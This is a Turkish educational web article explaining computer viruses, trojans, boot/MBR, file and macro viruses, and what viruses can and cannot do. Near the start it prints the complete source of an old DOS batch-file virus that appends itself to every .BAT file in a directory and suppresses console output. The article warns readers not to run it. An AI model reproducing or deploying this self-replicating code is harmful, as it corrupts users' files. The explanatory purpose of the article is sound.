Virüs nedir diye konumuza başlıyorum sevgili bilgisayar kullanıcıları virüsler bilgisayar ortamlarına kaçak olarak giren küçük programlardır. Sisteme girdiklerinde çoğalırlar ve tüm sistemi ele geçirirler virüsler kimilerine göre canlıdır çünkü yapay zekaları oldukları ve üreme iç güdüleri olduğundan canlı oldukları düşünülür
tabi bu tartışılır biz Kaos Team olarak bu yazıda bahsedeceğiz virüslerden nasıl korunuruz veya nasıl kurtuluruz. Konuya girmeden önce virüsler hakkında bilgi edinelim böylece bulaşma yolarını da öğrenebiliriz.
Herhangi bir yazılımın virüs olabilmesi için en az şu kriterleri sağlaması gereklidir:
1.çalıştırılabilir olmalı
2.kendi kendilerine çoğalması
3.diger çalışabilir objeleri kendi kolonisine çevirebilmesi
Bir bilgisayar virüsü yazmak çok kolaydır aşağıda verdiğimiz virüsün kaynak kodu da (batch file virüs)nün kaynak kodudur bu yazılım ms-dos işletim sisteminin bacth file yazılmıştır. Bu bir virüs yazılımıdır yalnızca virüslerin komutlarından oluşan bir yazılımı olduğunu göstermek amacıyla verilmiştir. Lütfen şaka amaçla da olsa bu yazılımı kimseye uygulamayınız zaten her virüs koruma programı tanıya bilmekte eski bir virüs yazılımıdır.
KAOS TEAM (BFV) KAYNAK KODU
echo The Batch Filr Virüs (BFT.BAT)
echo Osborne/McGraw-Hill ``Computer Virüs Handbook`` kitabından
echo -Bu program, bilgisayar virüslerinin nasıl çalıştıklarını ve
echo bir bilgisayar virüsünün ne kadar kolay olduğunu
echo göstermektedir.
echo -Bulunulan dizin:
cd
echo –
echo UYARI! BU PROGRAM, BULUNULAN DİZİNDEKİ BÜTÜN .BAT DOSYALARINA
echo BULAŞIR. BULAŞTIGI .BAT DOSYALARI DİGER .BAT DOSYALARINI DA
echo ETKİLER! BU PROGRAMI ÇALIŞTIRMAKLA BÜTÜN .BAT DOSYALARINIZI
echo BOZABİLİRSİNİZ!
echo –
echo Lütfen bu programı çalıştırmadan önce bütün .BAT dosyalarınızı
echo yedekleyiniz. Eğer nasıl yedekleme yapılacağını bilmiyorsanız
echo bu programı çalıştırmayın.
echo –
echo Yukarıdaki açıklamaları anladıysanız devam etmek için
echo herhangi bir tuşa; programdan çıkmak için ^C tuşlarına basınız.
pause > nul
cls
echo Bulunulan dizin
cd
echo Dizindeki bütün .BAT dosyalarına bulaşıyorum...
ctty nul
for % %f in (*.bat) do copy % % f + bfv.bat
ctty con
cls
echo Bu dizindeki bütün .BAT dosyalarına Batch File Virüsü
echo bulaşmıştır. Bu virüsü temizlemek için yedeklediğiniz .BAT
echo dosyalarını yerlerine kopyalayınız.
Şimdi virüs çeşitlerini sıralayacağız
Kullandıkları teknikler çok çeşitli olsa da, virüsler pratikte kabaca Dosya ve Boot virüsleri olarak ikiye ayrılırlar. Virüs deyince genelde akla ilk gelen dosya virüsleridir. Ama sık rastlanan birçok virüsün boot virüsü olduğunu da hatırlatmakta fayda var. Bir Cansu`yu, Crazy Boot`u, eskilerden Ping-Pong`u kim unutabilir ki?
Boot Virüsleri. Disketlerin ve sabit disklerin boot sektörlerine yerleşirler. Bilgisayar açıldığında veya sıfırlandığında (`reset`lendiğinde) disketin veya sabit diskin boot sektöründeki yükleyici program otomatik olarak çalıştırılır. Daha sonra işletim sistemi yüklenir ve bilgisayar normal kullanıma başlanır. Boot virüsleri, boot sektöründeki yükleme programında değişiklik yaparak kendilerini otomatik man çalıştırırlar. Böylece aktif hale gelirler ve bilgisayar kapatılana kadar bulaşmaya devam ederler.
Dosya Virüsleri. Dosya virüsleri genelde virüs deyince akla gelen virüs türüdür. Bunlar birer asalak gibi kendilerini programın sonuna eklerler. Programın başında da değişiklik yaparak, program çalıştırıldığında ilk önce kendileri çalışırlar. RAM belleğe bir TSR gibi yerleşirler ve bilgisayar kapatılana kadar bulaşmaya devam ederler. Genelde EXE ve COM`lara bulaşırlar. Bazılarının SYS, OVL ve BIN gibi program kodu dosyalarına bulaştığı da görülmüştür. Çoğu yalnızca çalıştırılan program dosyalarına bulaşmakla birlikte, Yandan Çarklı virüsü gibi olanları çalıştırılmayanlara da bulaşırlar.
Virüsümsüler. Virüslere benzeyen fakat virüs olmayan birçok program türü vardır. Bunların ortak özelliği bilgimiz dışında çalışmalarıdır. Örneğin bombalar; bir program yazılırken içine konur. Belli bir zamanda veya bazı şartların oluşmasına bakarak bilgisayar sistemine zarar verirler. Bombaların benzeri truva atlarıdır. Bunlar da programlara yerleştirilirler ve belli koşullar gerçekleştiğinde veya bir koşula bağlı olmaksızın daha ilk çalıştırılmada zarar verirler. Truva atları daha yaygın programlara yerleştirilirler. Ne bombalar ne de truva atları bulaşamazlar. Bu yüzden virüs değillerdir. Diğer "virüsümsüler", networklerde kullanıcı şifrelerini öğrenmek için kullanılırlar. Öğrendikleri şifreleri sahiplerine bildirirler. Bunlara bukalemun adı verilir.
turuva atı (trojan)
Özellikle güvenliği sadece kullananın becerisine kalmış kişisel bilgisayarlara karşı kullanılan ve uzaktan erişim olanağı sağlayan programlardır Trojanlar. Netbus ve sonrasında türeyen birçok trojan programının kendine has birçok özelliği var. Tam anlamıyla çalıştırılan makineyi kontrol altına alabilen trojanlardan işlevleri daha az olanlarına kadar şu an İnternet üzerinde dolaşan birçok program var.
Bunların en meşhuru : Subseven 2.1. Artık neredeyse kendi başına bir yazılım sektörü oluşan trojanların kendilerine göre versiyon ve güncellemeleri bile var. Öyle ki McAffee Network Associates firması, Subseven için "yüksek risklidir" demecini veriyor. Aslında kısa sürede gelişen virüs ve trojan piyasasına kimi virüs programı üreticilerinin içten içe destek verdiği paranoyasındayız. Düşünsenize camcı, cam kırılmazsa iş yapamaz eğer onun camları indiren bir afacan oğlu yoksa.
Virüs nedir ? Trojan (Truva ati) nedir ?
Virüsler, kendi kodlarını başka programlara veya program niteliği olan dosyalara bulaştırabilme özelliği olan (kendi kodunu kopyalayabilen) bilgisayar programlarıdır. Bulaştıkları bilgisayarda genelde hızlı bir şekilde yayılırlar. Belli bir amaca yönelik olarak yazılmış, zarar vermeye yönelik olabilecekleri gibi eğlence amacıyla da yazılmış olabilirler.
Truva atları, virüslerden oldukça farklı bir yapıya sahiptir. Asla başka programlara bulaşmazlar. Belli olaylara bağlı olarak tetiklenen bir rutindirler. Kendilerini kopyalayamadıkları için bazı programların içine bilinçli olarak yerleştirilirler. Trojanlar, ilgi çeken, utility gibi programların içine yerleştirilirler. Trojan kodu, trojanin içine gizlendiği programın yazarı tarafından yazılmış olabileceği gibi sonradan da programa eklenmiş olabilir. Trojanlar aslında kopya koruma amacıyla hazırlanırlar.
Virüsler çoğunlukla Assembly gibi düşük seviyeli bir programlama dili ile yazılırlar. Bunun asil 2 sebebi vardır.
1- Assembly`in çok güçlü bir dil olması:
2- Yazılan programların derlendikten sonraki dosya boylarının çok küçük olması
Bu özelliklerin her ikisi de virüs yazarlarının assembly dilini kullanması için yeterli ve gerekli sebeplerdir.
Virüsleri özelliklerine göre sınıflandırmak pek mümkün olmasa da aşağıdaki şekildeki gibi bir sınıflandırma yapmak yanlış olmayacaktır. Ancak pek çok virüs, pek çok özelliği bünyesinde barındırabilir. Bulaşma hızını arttırabilmek amacıyla yapılan bu durum sonucu virüs, boot sektörlere, mbr kayıtlarına, programlara bulaşabilir. Simdi de bu virüs türlerinin işleyişlerine bakalım
1 - Disk virüsleri : a- Boot b- MBR
2 - Dosya virüsleri : a- Program (TSR ve nonTSR) b- Makro virüsleri
3- FlashBIOS virüsleri
1 - DİSK VİRÜSLERİ
Disk virüsleri, adından da anlaşılacağı üzere, disk ve/veya disketler üzerinde işletim sistemi için özel anlamı olan bölgelere (boot sektör, MBR) yerleşen virüslerdir. Disk virüsleri, hakkında en çok yanlış bilginin olduğu virüs türüdür. Boot ve MBR virüsleri, aşağıda da göreceğiniz gibi işletim sisteminden önce hafızaya yüklenir. Bu yüzden işletim sistemini kolaylıkla atlatıp, Yukarıdaki şekilde de görüleceği gibi disk virüslerini boot ve MBR (partition) virüsleri olarak 2 gruba ayırabiliriz.
BOOT Virüsleri
Boot virüslerinin ne olduğuna geçmeden önce boot sektör nedir, disk üzerinde nerede bulunur, önce bunlara bir bakalım; Boot sektör, bir diskin veya disketin işletim sistemini yüklemeye yarayan 1 sektör (512 byte) uzunluğundaki bir programdır. Boot sektörler, disketlerde 0.ci iz, 0.ci kafa,1.ci sektör üzerinde bulunur. Hard disklerde ise boot sektörü 0.ci iz, 1.ci kafa ve 1.ci sektör üzerinde bulunur. Boot sektör, açılış için gerekli sistem dosyalarının yükleyen programdır. Ayni zamanda disk (veya disket) ile ilgili bilgileri saklar. DOS buradaki bilgileri kullanarak cylider hesaplarını yapar.
Normal koşullarda, bilgisayarı başlatabilecek durumdaki bir sistem disketini (virüssüz) sürücüye takip bilgisayarı açtığımızda, bilgisayar ilk olarak disket sürücüye bakar. Eğer sürücüde bir disket var ise bu disketin boot sektörü hafızanın 0000:7C00 (hex) adresine okunur ve okunan boot sektör çalıştırılır. Boot sektör, işletim sistemini yükleyerek denetimi işletim sistemine bırakır. Eğer bilgisayarı boot edecek disket bir boot virüsü içeriyorsa o zaman durum değişir. Bilgisayar, boot sektörü yine 0000:7C00 adresine okur ve akışı bu adrese yönlendirir. Disketten okunan boot kaydı, yapı olarak değiştiğinden dolayı, 0000:7C00`daki kod virüsü hafıza içine yükleyip, hafızadaki konumunu garanti altına alacaktır. Virüs aktivitesi için gerekli interrupt servislerini de kontrol altına aldıktan sonra orijinal boot kaydını okuyarak işletim sisteminin yüklenmesini sağlayacaktır.
MBR (Partition) Virüsleri
MBR virüsleri esas olarak, boot virüslerinden pek de farklı değildir. Ancak can alici bir nokta vardır ki, bu boot ve mbr virüsleri arasındaki en önemli noktadır. Hard diskler kapasite olarak çok farklı ve büyük kapasitede olduklarından diskin DOS`a tanıtılması amacıyla MBR - Master Boot Record (Ana açılış kaydı) denilen özel bir açılış programı içerirler. Bu kod diskin 0.ci iz, 0.ci kafa ve 1.ci sektörü üzerinde bulunur. Yani disketlerde boot sektörün bulunduğu konum, hard diskler için MBR yeridir. Master boot record, hangi disk partitionundan bilgisayarın açılacağını gösterir. Bu yüzden çok önemlidir. Eğer bilgisayar hard diskten boot ediliyorsa, o takdirde mbr ve partition table okunur. Aktif partitiona ait boot sektör okunur. Bundan sonrası boot sektör kısmındaki sistemin aynisidir.
2 - DOSYA VİRÜSLERİ
Dosya virüsleri açıkça anlaşılacağı gibi hedefi dosyalar olan virüslerdir. Dosya virüsleri çoğunlukla COM, EXE, SYS olmak üzere OVL, OVR, DOC, XLS, DXF gibi değişik tipte kütüklere bulaşabilirler.
Makro virüsleri
Makro virüsleri Word, Excel gibi programların makro dilleri ile (mesela VBA - Visual Basic for Applications) yazılırlar. Aktif olmaları bazı uygulamalara (word, excel vs) bağlı olduğundan program virüslerine oranla çok daha az etkilidirler.
Program virüsleri
(Not : Program virüsleri ile ilgili açıklamalar ileride detaylı olarak anlatılacaktır).
Program virüsleri, DOS`un çalıştırılabilir dosya uzantıları olan COM ve EXE türü programlar basta olmak üzere SYS, OVL, DLL gibi değişik sürücü ve kütüphane dosyalarını kendilerine kurban olarak seçip bu dosyalara bulaşabilirler. Dosya virüsleri bellekte sürekli kalmayan (nonTSR) ve bellekte yerleşik duran (TSR) olarak 2 tipte yazılırlar.
nonTSR (Bellekte sürekli kalmayan) virüsler
Bellekte sürekli olarak kalmazlar. Kodları oldukça basittir. Bellekte sürekli kalmayan virüsler sadece virüslü bir program çalıştırıldığında başka programlara bulaşabilirler. Virüslü program çalıştırıldığında programın başında program kontrolünü virüs koduna yönlendirecek bir takım komutlar bulunur. Virüs kontrolü bu şekilde ele aldıktan sonra virüs kendisine temiz olarak nitelendirilen virüssüz programlar aramaya koyulur. Bulduğu temiz programların sonuna kendi kodunu ekler ve programın başına da virüsün kontrolü ele alabilmesi için özel bir atlama komutu yerleştirir ve kendisine yeni kurban programlar arar. Virüs bulaşma işini bitirdikten sonra çalıştırmak istediğimiz program ile ilgili tüm ayarları düzenleyerek kontrolü konak programa devreder.
TSR (Bellekte sürekli kalan) virüsler
TSR virüsler yapı olarak TSR olmayan virüslerden çok farklıdır. TSR virüsler, 2 temel bölümden olusurlar.1.ci bölüm; Virüsün çalışması için gerekli ayarlamaları yapar ve TSR olacak kodu aktiflestirir.2.bölüm TSR olan kodun kendisidir ve TSR virüslerin hayati önemdeki bölümüdür. Bu tip virüsler, çalışmak için sadece TSR olmakla kalmazlar. Ayni zamanda çeşitli Interruptlari (kesilmeleri) kontrol altına alırlar. Böylece DOS üzerinden yapılan işlemleri bile kontrol altına alabilirler. Örnek vermek gerekirse; TSR bir virüs DIR, COPY gibi DOS komutları ile yapılan daha doğrusu yapılmak istenen- işlemleri kontrol altına alabilir. Kullanıcı DIR komutunu kullandığında dosya boylarının 0 olarak gösterilmesi, dosya boylarının eksik gösterilmesi gibi işlemler TSR bir virüs için çok kolaydır.
3 - FlashBIOS Virüsleri
FlashBIOS virüsleri tekrar yazılabilir özellikteki BIOS chiplerine bulaşırlar.
VİRÜSLER NELERİ YAPABİLİR, NELERİ YAPAMAZ ?
Virüslerin neleri yapıp neleri yapamayacakları konusu en çok ilgi çeken, üzerinde en çok konuşulan konulardan birisidir. Çünkü bir virüs, yaptıklarıyla anılır ve bilinir. Virüslerin en çok korkulan etkilerin başında gelenler şunlardır:
BIR VIRÜS BILGISAYARDAN SILINDIKTEN SONRA KENDI KENDINE TEKRAR ORTAYA ÇIKIP ETKINLESEBILIR MI ?
Hayır. Bir virüsün temizlenmesinden sonra durduk yerde yeniden peydahlanması doğru değildir. Eğer bir antivirüs programı ile sisteminizden virüsü temizlemenize rağmen virüs tekrar ortaya çıkıyorsa 2.durum söz konusu olabilir.
1- Antivirüs, virüsü temizleyemiyor olabilir. Amatör programcıların yazdıkları shareware olarak dağıtılan antivirüs programlarından birini kullanıyorsanız bu durumla karşılaşmanız olasıdır. Bunun pek çok sebebi olabilir. Örneğin antivirüs, virüsü başka bir virüsle karıştırıyor olabilir. İmza tarama esasına göre çalışan antivirüslerde ortaya çıkabilecek bu sorun genellikle iki virüsün birbirinin varyantı (üzerinde küçük değişiklikler yapılmış biçim) olmasından kaynaklanır. Bir veya birkaç virüsü temizlemek için hazırlanmış eski antivirüs programlarının o virüsün yeni bir varyantının temizlenmesi amacı ile kullanılması sonucu da ortaya çıkabilir. Mesela; elimizde bir programcının 4 yıl önce yazdığı xx virüsünün antivirüs programı olsun.1 yıl önce ortaya çıkan xx virüsünün bir varyantı olan xx.a gibi bir virüsü temizlemek istersek muhtemelen tarama imzaları ayni veya benzer yapıda olacağından bu tür bir sorun ile karşılaşabiliriz. Bunun sonucu olarak virüs uzunluğunun farklı olusundan dolayı yanlış isimle bile olsa tespit edilir ancak temizlenemez. Bu durumda antivirüs kullanıcıyı yeni bir virüsle karşılaştığını belirten bir mesaj ile uyarır.
2- Bir yerlerde temizlemeyi unuttuğunuz birkaç virüslü dosyanız kalmıştır. Virüs taramalarında taramayı unuttuğunuz disketleri kullanırsanız ve disketteki programlar virüslü ise siz farkına varmadan virüs tekrar sisteminize bulaşacaktır. Virüs taraması yaparken sahip olduğunuz tüm disk ve disketleri virüs taramasından geçirin. Ancak bu şekilde virüslerden kurtulabilirsiniz.
Burada belirtmek isterim ki, bu iki durumdan 2.sinin olması daha muhtemeldir. Birinci durumun gerçekleşme ihtimali çok azdır.
VIRÜSLER VERI DOSYALARINA ZARAR VEREBILIR MI ?
Evet, kesinlikle verebilir. Özel bir veya birkaç dosya türünü hedef alan virüsler, bu tür dosyalara silebilir veya içlerindeki veriyi değiştirebilir, dosyanın yapısını bozabilir. Örneğin yerli virüslerden Trakia.653 virüsü AutoCAD`in DXF ve DWG uzantılı dosyaları hedef almakta ve bu kütüklerin yapısını bozarak islenemeyecek hale getirmektedir.Trakia.560 virüsü bazı dosyaları silmektedir. Ancak bu tür etkiler virüsün fark edilmesi kolaylaştıracağından pek tercih edilmezler.
VİRÜSLER YAZMA-KORUMALI DİSKETLERE BULAŞABİLİR Mi ?
Disketlerin yazma koruması yazılımla kontrol edilen bir sistemdir ve bu sistem aşılabilir. Ancak yazma korumasını kapatmak virüs içinde ekstra kod anlamına gelir. Ekstra kod, virüsün boyunu uzatacak ve virüsün fark edilmesini kolaylaştıracaktır. Bu yüzden uygulanan bir yol değildir. Virüsler, yazma korumasını kapatmak yerine yazma korumasını kontrol edip koruma varsa bulaşmamayı tercih ederler.
VIRÜSLER CMOS`A BULASABILIR MI ?
Herhangi bir virüsün CMOS alanına bulaşması mümkün değildir. Hatta imkansızdır. CMOS bellek kapasitesi üretici firmaya bağlı olarak 128 veya 256 bayttır. Bu alan virüsün ihtiyaç duyacağı belleğin çok altındadır. Kaldı ki CMOS, setup parametrelerinin saklandığı bir veri alanıdır. Ancak virüsler setup parametlerini değiştirebilirler.
VİRÜSLER DONANIMA ZARAR VEREBİLİR Mİ ?
Eskiden kısmen, günümüzde hayır. Eski MDA (mochrome display adapter - tekrenkli görüntü bağdaştırıcısı) ekran kartlarına bir komut serisi yollanarak MDA kartlar yakılabilir. Ancak MDA kartlar çoktan tarih olduğundan artık bunun pek önemi de yok.
Eski disklerin okuma/yazma kafalarının ani hareketlerle hareket ettirilmesi sonucu diskin bozulmasını sağlamak mümkündü. Artık günümüzde ise disklerin cacheleri sayesinde bu tür hareketler disk tarafından engellenebiliyor ve disklerdeki kafalar manyetik bir esasa göre çalışıyor. Bu sayede elektrikler kesilse bile disk zarar görmeden kafalar park ediliyor.
Bir de disk üzerinde bir bölgenin milyonlarca kez formatlanması durumu var. Bu işlem sonunda disk üzerindeki manyetik malzeme zarar görecek, disk okunamaz duruma gelecektir. Bu işlemin partition table üzerinde yapıldığını düşünürsek diski kaldırıp çöpe atmaktan veya disk kasasını açıp raf süsü olarak kullanmak dışında geriye pek bir şey kalmaz. Ancak hemen belirteyim ki bu formatlama işlemi oldukça uzun sürecektir. Bir virüsü diski milyonlarca kez formatlamak isterse, kullanıcı bilgisayarın kilitlendiğini düşünecek ve resetleyecektir. Sonuçta virüs amacına ulaşamamış olacaktır.
Eğer Windows95/98/NT gibi bir işletim sisteminin çalıştığı bilgisayarlarda Windows direkt disk erişimlerini mümkün olduğunca engellemeye çalışır.
VIRÜSLER V-SAFE, VIRSCAN, GUARD GIBI KORUMA PROGRAMLARINI ATLATABİLİR Mİ ?
Yeni bir virüs veya çok iyi yazılmış bir virüs bu tür programları saf dışı edebilir. Ancak koruma programları virüslü programı daha çalışmadan önce test ettiklerinden bu düşük bir ihtimaldir. Virüsler, bu tür programları aktivitelerinin rapor edilmesinin engellemek için atlatmak ister.
|  anasayfa   |  sayfa başı  |   geri  |